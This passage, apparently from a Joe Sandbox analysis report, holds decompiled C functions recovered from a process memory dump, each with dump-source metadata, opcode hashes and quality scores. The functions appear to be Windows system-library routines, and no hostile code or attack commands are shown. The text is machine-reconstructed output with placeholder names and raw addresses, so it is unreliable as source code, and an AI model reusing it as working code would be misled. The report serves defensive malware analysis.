                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                            				if(_t45 !=  *_t8) {
                            					goto L22;
                            				}
                            				_t9 = _t77 + 0x24; // 0x38b8504
                            				E037E2280(_t9, _t9);
                            				_t87 = 0x78;
                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                            				E0380FA60( &_v156, 0, _t87);
                            				_t13 = _t77 + 0x30; // 0x3db8
                            				_t85 =  &_v156;
                            				_v36 =  *_t13;
                            				_v28 = _v168;
                            				_v32 = 0;
                            				_v24 = 0;
                            				_v20 = _v158;
                            				_v160 = 0;
                            				while(1) {
                            					_push( &_v164);
                            					_push(_t87);
                            					_push(_t85);
                            					_push(0x18);
                            					_push( &_v36);
                            					_push(0x1e);
                            					_t88 = E0380B0B0();
                            					if(_t88 != 0xc0000023) {
                            						break;
                            					}
                            					if(_t85 !=  &_v156) {
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                            					}
                            					_t84 = L037E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                            					_v168 = _v164;
                            					if(_t84 == 0) {
                            						_t88 = 0xc0000017;
                            						goto L19;
                            					} else {
                            						_t74 = _v160 + 1;
                            						_v160 = _t74;
                            						if(_t74 >= 0x10) {
                            							L19:
                            							_t86 = E037CCCC0(_t88);
                            							if(_t86 != 0) {
                            								L8:
                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                            								_t30 = _t77 + 0x24; // 0x38b8504
                            								E037DFFB0(_t77, _t84, _t30);
                            								if(_t84 != 0 && _t84 !=  &_v156) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                            								}
                            								if(_t86 != 0) {
                            									goto L12;
                            								} else {
                            									goto L11;
                            								}
                            							}
                            							L6:
                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                            							if(_v164 != 0) {
                            								_t83 = _t84;
                            								E037F4F49(_t77, _t84);
                            							}
                            							goto L8;
                            						}
                            						_t87 = _v168;
                            						continue;
                            					}
                            				}
                            				if(_t88 != 0) {
                            					goto L19;
                            				}
                            				goto L6;
                            			}



























                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f85a1e5b7ed3a2280e44b647dfa7b73700798031b7b4ff212a23a3f84253f62
                            • Instruction ID: b2a199b0beb60b9c3edf09fd5488789cea35b54041feb8f1d43d5a5a43df477a
                            • Opcode Fuzzy Hash: 3f85a1e5b7ed3a2280e44b647dfa7b73700798031b7b4ff212a23a3f84253f62
                            • Instruction Fuzzy Hash: 3A419635A00218AFCB21DF69C944BEAB7B8BF45710F4501E9E908EB340EB74DE84CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E037F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				signed int _v12;
                            				char _v176;
                            				char _v177;
                            				char _v184;
                            				intOrPtr _v192;
                            				intOrPtr _v196;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed short _t42;
                            				char* _t44;
                            				intOrPtr _t46;
                            				intOrPtr _t50;
                            				char* _t57;
                            				intOrPtr _t59;
                            				intOrPtr _t67;
                            				signed int _t69;
                            
                            				_t64 = __edx;
                            				_v12 =  *0x38bd360 ^ _t69;
                            				_t65 = 0xa0;
                            				_v196 = __edx;
                            				_v177 = 0;
                            				_t67 = __ecx;
                            				_v192 = __ecx;
                            				E0380FA60( &_v176, 0, 0xa0);
                            				_t57 =  &_v176;
                            				_t59 = 0xa0;
                            				if( *0x38b7bc8 != 0) {
                            					L3:
                            					while(1) {
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						_t67 = _v192;
                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                            						_push( &_v184);
                            						_push(_t59);
                            						_push(_t57);
                            						_push(0xa0);
                            						_push(_t57);
                            						_push(0xf);
                            						_t42 = E0380B0B0();
                            						if(_t42 != 0xc0000023) {
                            							break;
                            						}
                            						if(_v177 != 0) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                            						}
                            						_v177 = 1;
                            						_t44 = L037E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                            						_t59 = _v184;
                            						_t57 = _t44;
                            						if(_t57 != 0) {
                            							continue;
                            						} else {
                            							_t42 = 0xc0000017;
                            							break;
                            						}
                            					}
                            					if(_t42 != 0) {
                            						_t65 = E037CCCC0(_t42);
                            						if(_t65 != 0) {
                            							L10:
                            							if(_v177 != 0) {
                            								if(_t57 != 0) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                            								}
                            							}
                            							_t46 = _t65;
                            							L12:
                            							return E0380B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                            						}
                            						L7:
                            						_t50 = _a4;
                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                            						if(_t50 != 3) {
                            							if(_t50 == 2) {
                            								goto L8;
                            							}
                            							L9:
                            							if(E0380F380(_t67 + 0xc, 0x37a5138, 0x10) == 0) {
                            								 *0x38b60d8 = _t67;
                            							}
                            							goto L10;
                            						}
                            						L8:
                            						_t64 = _t57 + 0x28;
                            						E037F4F49(_t67, _t57 + 0x28);
                            						goto L9;
                            					}
                            					_t65 = 0;
                            					goto L7;
                            				}
                            				if(E037F4E70(0x38b86b0, 0x37f5690, 0, 0) != 0) {
                            					_t46 = E037CCCC0(_t56);
                            					goto L12;
                            				} else {
                            					_t59 = 0xa0;
                            					goto L3;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6dc37cee371952ff511d2d3b503f3c21c9f91506c1c612bc412d367b01273275
                            • Instruction ID: 241d82c208c7951dde9c8514d204b26e09ff0ad644436722da127fe4705e6319
                            • Opcode Fuzzy Hash: 6dc37cee371952ff511d2d3b503f3c21c9f91506c1c612bc412d367b01273275
                            • Instruction Fuzzy Hash: 7D41CD75A40318AFEB21DF29CC80BABB7A9FB45614F0400E9EA459B381E774DD448A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E037D8A0A(intOrPtr* __ecx, signed int __edx) {
                            				signed int _v8;
                            				char _v524;
                            				signed int _v528;
                            				void* _v532;
                            				char _v536;
                            				char _v540;
                            				char _v544;
                            				intOrPtr* _v548;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t44;
                            				void* _t46;
                            				void* _t48;
                            				signed int _t53;
                            				signed int _t55;
                            				intOrPtr* _t62;
                            				void* _t63;
                            				unsigned int _t75;
                            				signed int _t79;
                            				unsigned int _t81;
                            				unsigned int _t83;
                            				signed int _t84;
                            				void* _t87;
                            
                            				_t76 = __edx;
                            				_v8 =  *0x38bd360 ^ _t84;
                            				_v536 = 0x200;
                            				_t79 = 0;
                            				_v548 = __edx;
                            				_v544 = 0;
                            				_t62 = __ecx;
                            				_v540 = 0;
                            				_v532 =  &_v524;
                            				if(__edx == 0 || __ecx == 0) {
                            					L6:
                            					return E0380B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                            				} else {
                            					_v528 = 0;
                            					E037DE9C0(1, __ecx, 0, 0,  &_v528);
                            					_t44 = _v528;
                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                            					_t46 = 0xa;
                            					_t87 = _t81 - _t46;
                            					if(_t87 > 0 || _t87 == 0) {
                            						 *_v548 = 0x37a1180;
                            						L5:
                            						_t79 = 1;
                            						goto L6;
                            					} else {
                            						_t48 = E037F1DB5(_t62,  &_v532,  &_v536);
                            						_t76 = _v528;
                            						if(_t48 == 0) {
                            							L9:
                            							E03803C2A(_t81, _t76,  &_v544);
                            							 *_v548 = _v544;
                            							goto L5;
                            						}
                            						_t62 = _v532;
                            						if(_t62 != 0) {
                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                            							_t53 =  *_t62;
                            							_v528 = _t53;
                            							if(_t53 != 0) {
                            								_t63 = _t62 + 4;
                            								_t55 = _v528;
                            								do {
                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                            										if(E037D8999(_t63,  &_v540) == 0) {
                            											_t55 = _v528;
                            										} else {
                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                            											_t55 = _v528;
                            											if(_t75 >= _t83) {
                            												_t83 = _t75;
                            											}
                            										}
                            									}
                            									_t63 = _t63 + 0x14;
                            									_t55 = _t55 - 1;
                            									_v528 = _t55;
                            								} while (_t55 != 0);
                            								_t62 = _v532;
                            							}
                            							if(_t62 !=  &_v524) {
                            								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                            							}
                            							_t76 = _t83 & 0x0000ffff;
                            							_t81 = _t83 >> 0x10;
                            						}
                            						goto L9;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c9bddd619487e31f980abe212e0cae53b929485e6ab653b5dca7c586f7bc9ef5
                            • Instruction ID: e5f0a89f9b760e52d30e471e40bc3760665aa5a5cb5aa2a0ec3fc17b5731d7ed
                            • Opcode Fuzzy Hash: c9bddd619487e31f980abe212e0cae53b929485e6ab653b5dca7c586f7bc9ef5
                            • Instruction Fuzzy Hash: 8D4141B5A4032CABDB24DF59CC88AA9B7B8EB84300F1446E9D919D7251E7709E84CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0388FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _t29;
                            				char* _t32;
                            				char* _t43;
                            				signed int _t80;
                            				signed int* _t84;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t56 = __edx;
                            				_t84 = __ecx;
                            				_t80 = E0388FD4E(__ecx, __edx);
                            				_v12 = _t80;
                            				if(_t80 != 0) {
                            					_t29 =  *__ecx & _t80;
                            					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                            					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                            						E03890A13(__ecx, _t80, 0, _a4);
                            						_t80 = 1;
                            						if(E037E7D50() == 0) {
                            							_t32 = 0x7ffe0380;
                            						} else {
                            							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            						}
                            						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            							_push(3);
                            							L21:
                            							E03881608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                            						}
                            						goto L22;
                            					}
                            					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                            						_t80 = E03892B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                            						if(_t80 != 0) {
                            							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                            							_t77 = _v8;
                            							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                            								E0388C8F7(_t66, _t77, 0);
                            							}
                            						}
                            					} else {
                            						_t80 = E0388DBD2(__ecx[0xb], _t74, __edx, _a4);
                            					}
                            					if(E037E7D50() == 0) {
                            						_t43 = 0x7ffe0380;
                            					} else {
                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                            						goto L22;
                            					} else {
                            						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                            						goto L21;
                            					}
                            				} else {
                            					_push(__ecx);
                            					_push(_t80);
                            					E0388A80D(__ecx[0xf], 9, __edx, _t80);
                            					L22:
                            					return _t80;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                            • Instruction ID: a961515b5cdc0a3b8ecba61938a846a71abb637bb9e2472e690d8a98e4ecfb32
                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                            • Instruction Fuzzy Hash: B731C036200644AFDB26EBE8D844F6ABBE9EFC5650F184499E646CF342DB74D841C720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E0388EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                            				signed int _v8;
                            				char _v12;
                            				intOrPtr _v15;
                            				char _v16;
                            				intOrPtr _v19;
                            				void* _v28;
                            				intOrPtr _v36;
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t26;
                            				signed int _t27;
                            				char* _t40;
                            				unsigned int* _t50;
                            				intOrPtr* _t58;
                            				unsigned int _t59;
                            				char _t75;
                            				signed int _t86;
                            				intOrPtr _t88;
                            				intOrPtr* _t91;
                            
                            				_t75 = __edx;
                            				_t91 = __ecx;
                            				_v12 = __edx;
                            				_t50 = __ecx + 0x30;
                            				_t86 = _a4 & 0x00000001;
                            				if(_t86 == 0) {
                            					E037E2280(_t26, _t50);
                            					_t75 = _v16;
                            				}
                            				_t58 = _t91;
                            				_t27 = E0388E815(_t58, _t75);
                            				_v8 = _t27;
                            				if(_t27 != 0) {
                            					E037CF900(_t91 + 0x34, _t27);
                            					if(_t86 == 0) {
                            						E037DFFB0(_t50, _t86, _t50);
                            					}
                            					_push( *((intOrPtr*)(_t91 + 4)));
                            					_push( *_t91);
                            					_t59 =  *(_v8 + 0x10);
                            					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                            					_push(0x8000);
                            					_t11 = _t53 - 1; // 0x0
                            					_t12 = _t53 - 1; // 0x0
                            					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                            					E0388AFDE( &_v12,  &_v16);
                            					asm("lock xadd [eax], ecx");
                            					asm("lock xadd [eax], ecx");
                            					E0388BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                            					_t55 = _v36;
                            					_t88 = _v36;
                            					if(E037E7D50() == 0) {
                            						_t40 = 0x7ffe0388;
                            					} else {
                            						_t55 = _v19;
                            						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            					}
                            					if( *_t40 != 0) {
                            						E0387FE3F(_t55, _t91, _v15, _t55);
                            					}
                            				} else {
                            					if(_t86 == 0) {
                            						E037DFFB0(_t50, _t86, _t50);
                            						_t75 = _v16;
                            					}
                            					_push(_t58);
                            					_t88 = 0;
                            					_push(0);
                            					E0388A80D(_t91, 8, _t75, 0);
                            				}
                            				return _t88;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction ID: b9b12177f5c8453a4576612994e842190bc2e9cf55d19fcdbed8c8e9932a8337
                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction Fuzzy Hash: C231D2366047059BC719EF68CC84A6BB7AAFFC4710F08496DF556CB641DE34E805CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E038469A6(signed short* __ecx, void* __eflags) {
                            				signed int _v8;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				signed int _v24;
                            				signed short _v28;
                            				signed int _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				char* _v44;
                            				signed int _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				char _v60;
                            				signed int _v64;
                            				char _v68;
                            				char _v72;
                            				signed short* _v76;
                            				signed int _v80;
                            				char _v84;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t68;
                            				intOrPtr _t73;
                            				signed short* _t74;
                            				void* _t77;
                            				void* _t78;
                            				signed int _t79;
                            				signed int _t80;
                            
                            				_v8 =  *0x38bd360 ^ _t80;
                            				_t75 = 0x100;
                            				_v64 = _v64 & 0x00000000;
                            				_v76 = __ecx;
                            				_t79 = 0;
                            				_t68 = 0;
                            				_v72 = 1;
                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                            				_t77 = 0;
                            				if(L037D6C59(__ecx[2], 0x100, __eflags) != 0) {
                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                            					if(_t79 != 0 && E03846BA3() != 0) {
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0x1f0003);
                            						_push( &_v64);
                            						if(E03809980() >= 0) {
                            							E037E2280(_t56, 0x38b8778);
                            							_t77 = 1;
                            							_t68 = 1;
                            							if( *0x38b8774 == 0) {
                            								asm("cdq");
                            								 *(_t79 + 0xf70) = _v64;
                            								 *(_t79 + 0xf74) = 0x100;
                            								_t75 = 0;
                            								_t73 = 4;
                            								_v60 =  &_v68;
                            								_v52 = _t73;
                            								_v36 = _t73;
                            								_t74 = _v76;
                            								_v44 =  &_v72;
                            								 *0x38b8774 = 1;
                            								_v56 = 0;
                            								_v28 = _t74[2];
                            								_v48 = 0;
                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                            								_v40 = 0;
                            								_v32 = 0;
                            								_v24 = 0;
                            								_v16 = 0;
                            								if(E037CB6F0(0x37ac338, 0x37ac288, 3,  &_v60) == 0) {
                            									_v80 = _v80 | 0xffffffff;
                            									_push( &_v84);
                            									_push(0);
                            									_push(_v64);
                            									_v84 = 0xfa0a1f00;
                            									E03809520();
                            								}
                            							}
                            						}
                            					}
                            				}
                            				if(_v64 != 0) {
                            					_push(_v64);
                            					E038095D0();
                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                            				}
                            				if(_t77 != 0) {
                            					E037DFFB0(_t68, _t77, 0x38b8778);
                            				}
                            				_pop(_t78);
                            				return E0380B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6e4c6cf975c04d6c2d2d1c77d355be8369488253723b3cd4dfd1e2c66df5d51
                            • Instruction ID: 9d5d18ab3518ed43e37fd215ca3156a7da771bca4c1a327f3b45b44e67fe2b09
                            • Opcode Fuzzy Hash: b6e4c6cf975c04d6c2d2d1c77d355be8369488253723b3cd4dfd1e2c66df5d51
                            • Instruction Fuzzy Hash: D4417CB5E01708AFDB14DFA9C840BAEBBF8EF48314F1881A9E414E6251EB709905CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E037C5210(intOrPtr _a4, void* _a8) {
                            				void* __ecx;
                            				intOrPtr _t31;
                            				signed int _t32;
                            				signed int _t33;
                            				intOrPtr _t35;
                            				signed int _t52;
                            				void* _t54;
                            				void* _t56;
                            				unsigned int _t59;
                            				signed int _t60;
                            				void* _t61;
                            
                            				_t61 = E037C52A5(1);
                            				if(_t61 == 0) {
                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                            				} else {
                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                            				}
                            				_t60 = _t59 >> 1;
                            				_t32 = 0x3a;
                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                            					_t52 = _t60 + _t60;
                            					if(_a4 > _t52) {
                            						goto L5;
                            					}
                            					if(_t61 != 0) {
                            						asm("lock xadd [esi], eax");
                            						if((_t32 | 0xffffffff) == 0) {
                            							_push( *((intOrPtr*)(_t61 + 4)));
                            							E038095D0();
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            						}
                            					} else {
                            						E037DEB70(_t54, 0x38b79a0);
                            					}
                            					_t26 = _t52 + 2; // 0xddeeddf0
                            					return _t26;
                            				} else {
                            					_t52 = _t60 + _t60;
                            					if(_a4 < _t52) {
                            						if(_t61 != 0) {
                            							asm("lock xadd [esi], eax");
                            							if((_t32 | 0xffffffff) == 0) {
                            								_push( *((intOrPtr*)(_t61 + 4)));
                            								E038095D0();
                            								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            							}
                            						} else {
                            							E037DEB70(_t54, 0x38b79a0);
                            						}
                            						return _t52;
                            					}
                            					L5:
                            					_t33 = E0380F3E0(_a8, _t54, _t52);
                            					if(_t61 == 0) {
                            						E037DEB70(_t54, 0x38b79a0);
                            					} else {
                            						asm("lock xadd [esi], eax");
                            						if((_t33 | 0xffffffff) == 0) {
                            							_push( *((intOrPtr*)(_t61 + 4)));
                            							E038095D0();
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            						}
                            					}
                            					_t35 = _a8;
                            					if(_t60 <= 1) {
                            						L9:
                            						_t60 = _t60 - 1;
                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                            						goto L10;
                            					} else {
                            						_t56 = 0x3a;
                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                            							 *((short*)(_t52 + _t35)) = 0;
                            							L10:
                            							return _t60 + _t60;
                            						}
                            						goto L9;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d1d338b8bac1c70a7ac3a2f21ec349d63ba85a6f0e374d49166c015e7315f798
                            • Instruction ID: 384fb59b07af68ec9698c441861e3a802910b557c1ac06f0699fdaa015db522a
                            • Opcode Fuzzy Hash: d1d338b8bac1c70a7ac3a2f21ec349d63ba85a6f0e374d49166c015e7315f798
                            • Instruction Fuzzy Hash: 5C312571252750ABC726EB99CC40F66BBA9FF00770F14476DE4558F6A1D721F840CA90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E037FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t35;
                            				intOrPtr _t39;
                            				intOrPtr _t45;
                            				intOrPtr* _t51;
                            				intOrPtr* _t52;
                            				intOrPtr* _t55;
                            				signed int _t57;
                            				intOrPtr* _t59;
                            				intOrPtr _t68;
                            				intOrPtr* _t77;
                            				void* _t79;
                            				signed int _t80;
                            				intOrPtr _t81;
                            				char* _t82;
                            				void* _t83;
                            
                            				_push(0x24);
                            				_push(0x38a0220);
                            				E0381D08C(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                            				_t79 = __ecx;
                            				_t35 =  *0x38b7b9c; // 0x0
                            				_t55 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                            				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                            				if(_t55 == 0) {
                            					_t39 = 0xc0000017;
                            					L11:
                            					return E0381D0D1(_t39);
                            				}
                            				_t68 = 0;
                            				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                            				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                            				_t7 = _t55 + 8; // 0x8
                            				_t57 = 6;
                            				memcpy(_t7, _t79, _t57 << 2);
                            				_t80 = 0xfffffffe;
                            				 *(_t83 - 4) = _t80;
                            				if(0 < 0) {
                            					L14:
                            					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                            					L20:
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                            					_t39 = _t81;
                            					goto L11;
                            				}
                            				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                            					_t81 = 0xc000007b;
                            					goto L20;
                            				}
                            				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                            					_t59 =  *((intOrPtr*)(_t83 + 8));
                            					_t45 =  *_t59;
                            					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                            					 *_t59 = _t45 + 1;
                            					L6:
                            					 *(_t83 - 4) = 1;
                            					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                            					 *(_t83 - 4) = _t80;
                            					if(_t68 < 0) {
                            						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                            						if(_t82 == 0) {
                            							goto L14;
                            						}
                            						asm("btr eax, ecx");
                            						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                            						if( *_t82 != 0) {
                            							 *0x38b7b10 =  *0x38b7b10 - 8;
                            						}
                            						goto L20;
                            					}
                            					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                            					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                            					_t51 =  *0x38b536c; // 0x31d2c38
                            					if( *_t51 != 0x38b5368) {
                            						_push(3);
                            						asm("int 0x29");
                            						goto L14;
                            					}
                            					 *_t55 = 0x38b5368;
                            					 *((intOrPtr*)(_t55 + 4)) = _t51;
                            					 *_t51 = _t55;
                            					 *0x38b536c = _t55;
                            					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                            					if(_t52 != 0) {
                            						 *_t52 = _t55;
                            					}
                            					_t39 = 0;
                            					goto L11;
                            				}
                            				_t77 =  *((intOrPtr*)(_t83 + 8));
                            				_t68 = E037FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                            				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                            				if(_t68 < 0) {
                            					goto L14;
                            				}
                            				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                            				goto L6;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
